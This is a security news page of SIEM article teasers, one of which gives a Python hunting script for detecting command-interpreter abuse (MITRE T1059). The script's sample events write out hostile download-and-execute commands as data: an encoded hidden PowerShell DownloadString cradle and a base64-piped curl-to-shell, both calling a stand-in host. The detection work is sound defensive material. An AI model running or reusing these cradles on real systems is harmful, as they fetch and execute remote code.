Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

The latest news and information on Security Information and Event Management (SIEM).

Your network evidence, your SIEM, your way: Corelight's open SIEM strategy empowers SOCs with a unified experience

Security operations centers (SOCs) are under constant pressure to keep their organizations secure, while battling alert fatigue, tool sprawl, and ever-rising demands for speed and precision. Analysts today face an overwhelming landscape where context is thin, telemetry is inconsistent, and critical signals are buried in noise. At Corelight, we’re focused on one simple idea: Your network evidence should work wherever your SOC team does.

Elastic Security Labs provides an under-the-hood look at its detection engineering processes

The 2025 State of Detection Engineering at Elastic explores how we create, maintain, and assess our SIEM and EDR rulesets. Today, Elastic Security Labs is releasing the 2025 State of Detection Engineering at Elastic. This brand-new report is the first of its kind: rather than a traditional survey-style State of Detection Engineering report, it pulls back the curtain on our own detection engineering practices.

Zero trust for public sector organizations

The “never trust, always verify” premise of Zero Trust requires a significant shift in how agencies evaluate security risks. Every transaction demands a risk assessment across every Zero Trust pillar, a tough task when the key data is locked in different systems and tools. A unified data platform can serve as the glue that connects those systems, making the resulting picture more integrated, accurate, and trustworthy.

Less noise, more signal: How Elastic Defend slashed event volume

When an EDR tool generates too much endpoint telemetry, security teams quickly run into problems. Mountains of process events, network connections, and file operations can overwhelm analysts, making it harder to spot real threats in the noise. High data volumes drive up storage costs, slow down searches, and contribute to alert fatigue — leading to longer investigation times and potential blind spots.

Understanding AWS Cloud Security

When Amazon Web Services (AWS) launched in 2006, it offered on-demand storage and compute services (S3 and EC2) that developers could build on; managed database services followed later. Over time, AWS became a fundamental cloud service provider as organizations migrated to the cloud. As one of the three primary cloud service providers, AWS remains integral to most businesses.

Using LimaCharlie as an Observability Pipeline to reduce SIEM storage costs

LimaCharlie's SecOps Cloud Platform (SCP) creates a scalable, versatile, and actionable observability pipeline by collecting and standardizing telemetry from the full security stack: data is streamed from any input and routed to any output. The SCP provides visibility into telemetry sources and lets users create automated responses to actionable events in the pipeline.

Strengthening cyber resilience with Elastic Security and Observability

A guide to aligning with SEBI’s CSCRF using Elastic's integrated security and observability capabilities.

Financial institutions in India are preparing for a new era of cybersecurity compliance with the Securities and Exchange Board of India’s (SEBI) Cybersecurity and Cyber Resilience Framework (CSCRF).

Hunting with Elastic Security: Detecting command and scripting interpreter execution

Stealthy adversaries continually abuse built-in system utilities to execute malicious code. A particularly potent and frequently misused technique is MITRE ATT&CK T1059 - Command and Scripting Interpreter, in which attackers use interpreters that already ship with the system, such as PowerShell, cmd, Bash, Python, or JavaScript, to run arbitrary commands. Because these interpreters also carry heavy legitimate traffic, hunting for T1059 means looking at how they are invoked (encoded or obfuscated arguments, download cradles, hidden windows) and by whom (unusual parent processes), not merely whether they ran.
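The hunting logic described above, carried through on constructed process-creation events as an added example (this is not Elastic's rule set or the article's own code). The ECS-like event shape, the interpreter and parent lists, the indicator regexes, and the weights and threshold are all assumptions chosen for illustration; the PowerShell -EncodedCommand payload is decoded (base64 of UTF-16LE) and scanned alongside the visible command line, which is what catches the download cradle in the third sample.

```python
"""Flag MITRE ATT&CK T1059 (Command and Scripting Interpreter) abuse in
process-creation events. Example code written for this page; the event
layout, indicator list, weights and threshold are illustrative assumptions."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Executables treated as interpreters (case-insensitive basename match). Assumed list.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "pwsh", "cmd.exe", "wscript.exe", "cscript.exe",
    "bash", "sh", "dash", "zsh", "python", "python3", "python.exe", "perl",
    "ruby", "node", "node.exe", "osascript",
}

# Parents that rarely have a legitimate reason to spawn an interpreter:
# document/mail readers (phishing payloads) and web servers (webshells). Assumed list.
UNUSUAL_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
    "apache2", "httpd", "nginx", "w3wp.exe",
}

# Captures the base64 blob after PowerShell's -e/-ec/-en/-enc/-EncodedCommand switch.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# (label, weight, pattern) scanned over the command line plus any decoded payload.
INDICATORS = [
    ("encoded_command", 2, ENC_RE),
    ("hidden_window", 2, re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("policy_bypass", 2, re.compile(r"(?i)-(ep|ex|exec|executionpolicy)\s+bypass")),
    ("invoke_expression", 2, re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("download_cradle", 3, re.compile(
        r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b).*(https?|ftp)://")),
    ("base64_pipe", 3, re.compile(r"(?i)base64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b")),
    ("inline_code", 1, re.compile(r"(?i)(^|\s)(-c|-e)\s+\S")),  # bash -c / python -c / perl -e
]
ALERT_THRESHOLD = 3  # a lone "bash -c" is routine on servers; require corroboration


@dataclass
class Finding:
    host: str
    user: str
    process: str
    parent: str
    indicators: List[str]
    score: int
    decoded: Optional[str]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> Optional[Finding]:
    """Score one process-creation event; None means no alert."""
    proc = event["process"]
    name = basename(proc["executable"])
    if name not in INTERPRETERS:
        return None
    cmdline = " ".join(proc["args"])
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(label, w) for label, w, rx in INDICATORS if rx.search(haystack)]
    parent = basename(proc["parent"]["executable"])
    if parent in UNUSUAL_PARENTS:
        hits.append(("unusual_parent", 3))
    score = sum(w for _, w in hits)
    if score < ALERT_THRESHOLD:
        return None  # interpreter ran, but nothing corroborates abuse: keep it out of the queue
    return Finding(event["host"]["name"], event["user"]["name"], name, parent,
                   [label for label, _ in hits], score, decoded)


def hunt(events: List[dict]) -> List[Finding]:
    return [f for f in map(analyze, events) if f is not None]


def _ps_encoded(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode("ascii")


# Constructed sample events in an ECS-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"host": {"name": "ci-01"}, "user": {"name": "jenkins"},
     "process": {"executable": "/usr/bin/python3", "args": ["python3", "build.py", "--release"],
                 "parent": {"executable": "/bin/bash"}}},
    {"host": {"name": "ci-01"}, "user": {"name": "jenkins"},
     "process": {"executable": "/bin/bash", "args": ["bash", "-c", "make -j4 all"],
                 "parent": {"executable": "/usr/bin/java"}}},
    {"host": {"name": "ws-117"}, "user": {"name": "alice"},
     "process": {"executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "args": ["powershell.exe", "-w", "hidden", "-ep", "bypass", "-enc",
                          _ps_encoded("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")],
                 "parent": {"executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}}},
    {"host": {"name": "web-03"}, "user": {"name": "www-data"},
     "process": {"executable": "/bin/sh",
                 "args": ["sh", "-c", "echo " + _b64("curl http://198.51.100.7/x | sh") + " | base64 -d | sh"],
                 "parent": {"executable": "/usr/sbin/apache2"}}},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.parent} -> {f.process} score={f.score} {f.indicators}")
```

The two CI events are interpreter executions too, which is exactly why matching on the interpreter name alone drowns analysts: only the Office-spawned, hidden, policy-bypassing, encoded PowerShell and the web-server-spawned base64-to-shell pipe cross the threshold. In a production rule the same indicators would be expressed in the SIEM's query language and the weights tuned per environment; the decode step matters because an encoded command hides the cradle from any rule that only reads the raw argument string.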

Empowering US federal AI initiatives: How Elastic helps agencies comply with M-25-21 and M-25-22

A practical guide for chief AI officers and technology leaders implementing federal AI governance.

The US Office of Management and Budget's recent memoranda — M-25-21, "Accelerating Federal Use of AI through Innovation, Governance, and Public Trust," and M-25-22, "Driving Efficient Acquisition of Artificial Intelligence in Government" — establish comprehensive frameworks for federal agencies that implement AI systems while maintaining appropriate safeguards.